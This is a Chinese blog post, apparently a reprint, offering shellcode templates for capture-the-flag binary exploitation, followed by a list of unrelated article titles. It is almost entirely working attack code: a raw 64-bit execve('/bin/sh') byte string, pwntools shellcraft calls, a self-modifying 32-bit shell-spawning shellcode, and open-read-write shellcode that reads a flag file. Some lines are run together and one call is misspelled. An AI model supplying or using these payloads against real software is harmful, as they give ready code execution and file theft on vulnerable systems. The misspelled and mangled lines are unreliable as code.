博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
orw_shellcode_模板
阅读量:2134 次
发布时间:2019-04-30

本文共 2190 字,大约阅读时间需要 7 分钟。

orw

64位

shellcode

shellcode = "\x6a\x3b\x58\x99\x52\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x53\x54\x5f\x52\x57\x54\x5e\x0f\x05"
#pwntoolscontext.arch = elf.archshellcode = asm(shellcreaft.sh())

orw

#pwntoolsshellcode = ''shellcode += shellcraft.open('./flag')shellcode += shellcraft.read('eax','esp',0x100)shellcode += shellcraft.write(1,'esp',0x100)payload1 = asm(shellcode)
shellcode = asm('''    push 0x67616c66    mov rdi,rsp    xor esi,esi    push 2    pop rax    syscall    mov rdi,rax    mov rsi,rsp    mov edx,0x100    xor eax,eax    syscall    mov edi,1    mov rsi,rsp    push 1    pop rax    syscall    ''')

32位

shellcode

context.arch = elf.archshellcode = asm(shellcreaft.sh())
shellcode = asm('''                    push eax                    pop ebx                     push edx                    pop eax                    dec eax                    xor al,0x46                    xor byte ptr[ebx+0x35],al #set int 0x80                    xor byte ptr[ebx+0x36],al                    push ecx                     pop eax                    xor al, 0x41                    xor al, 0x40                    push ecx                    pop eax                    xor al, 0x41                    xor al, 0x40                    push ecx                    pop eax                    xor al, 0x41                    xor al, 0x40                    push ecx # set al=0xb                    pop eax                    xor al, 0x41                    xor al, 0x40                    push edx  # set ecx=0                    pop ecx                    push 0x68 # push /bin/sh                    push 0x732f2f2f                    push 0x6e69622f                    push esp                    pop ebx                    ''')

orw

#write by asmshellcode = """/*open(./flag)*/push 0x1010101xor dword ptr [esp], 0x1016660push 0x6c662f2emov eax,0x5mov ebx,espxor ecx,ecxint 0x80/*read(fd,buf,0x100)*/mov ebx,eaxmov ecx,espmov edx,0x30mov eax,0x3int 0x80/*write(1,buf,0x100)*/mov ebx,0x1mov eax,0x4int 0x80"""
#pwntoolsshellcode = ''shellcode += shellcraft.open('./flag')shellcode += shellcraft.read('eax','esp',0x100)shellcode += shellcraft.write(1,'esp',0x100)payload1 = asm(shellcode)

转载地址:http://mtugf.baihongyu.com/

你可能感兴趣的文章
程序员--学习之路--技巧
查看>>
解决问题之 MySQL慢查询日志设置
查看>>
contOS6 部署 lnmp、FTP、composer、ThinkPHP5、docker详细步骤
查看>>
TP5.1模板布局中遇到的坑,配置完不生效解决办法
查看>>
PHPstudy中遇到的坑No input file specified,以及传到linux环境下遇到的坑,模板文件不存在
查看>>
TP5.1事务操作和TP5事务回滚操作多表
查看>>
composer install或composer update 或 composer require phpoffice/phpexcel 失败解决办法
查看>>
TP5.1项目从windows的Apache服务迁移到linux的Nginx服务需要注意几点。
查看>>
win10安装软件 打开时报错 找不到 msvcp120.dll
查看>>
PHPunit+Xdebug代码覆盖率以及遇到的问题汇总
查看>>
PHPUnit安装及使用
查看>>
PHP项目用xhprof性能分析(安装及应用实例)
查看>>
composer安装YII
查看>>
Sublime text3快捷键演示
查看>>
sublime text3 快捷键修改
查看>>
关于PHP几点建议
查看>>
硬盘的接口、协议
查看>>
VLAN与子网划分区别
查看>>
Cisco Packet Tracer教程
查看>>
02. 交换机的基本配置和管理
查看>>